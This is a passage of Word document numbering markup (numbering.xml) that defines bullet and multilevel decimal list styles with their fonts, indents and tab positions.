        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3960" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4680" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5400" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6120" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6840" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7560" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8280" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="126F638D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D3981BA8"/>
    <w:lvl w:ilvl="0" w:tplc="04090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7200" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7920" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8640" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="15CF4FE6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DFE4E84A"/>
    <w:lvl w:ilvl="0" w:tplc="04090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2634" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3354" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4074" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4794" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5514" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6234" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6954" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7674" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8394" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="16223C5D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="57D298C0"/>
    <w:lvl w:ilvl="0" w:tplc="0409000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1DFA2758"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="350C79F2"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Numbered"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="26FD7C2A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6ED690B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285A3C79"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5964E09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358911C5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EC38D5A4"/>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380C749A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="38989E70"/>
    <w:lvl w:ilvl="0" w:tplc="04090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2634" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3354" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4074" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4794" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5514" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6234" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6954" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7674" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8394" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="38AC4E5F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3D6A90C2"/>
    <w:lvl w:ilvl="0" w:tplc="04090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1493" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2213" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2933" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3653" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4373" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5093" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5813" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6533" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7253" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="45CC672E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C37A9E80"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="ListBullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="46D632D0"/>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16" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4DB86152"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AC085C2E"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.0"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="72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17" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="61596EE4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F63ACE20"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.0"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:b/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:caps w:val="0"/>
        <w:smallCaps w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:vanish w:val="0"/>
        <w:color w:val="000000"/>
        <w:spacing w:val="0"/>
        <w:w w:val="0"/>
        <w:kern w:val="0"/>
        <w:position w:val="0"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:u w:val="none"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:b/>
        <w:i w:val="0"/>
        <w:sz w:val="24"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="-1440"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="-180"/>
        </w:tabs>
        <w:ind w:left="2700" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="3600" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="4320" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="5040" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="5760" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="6480" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
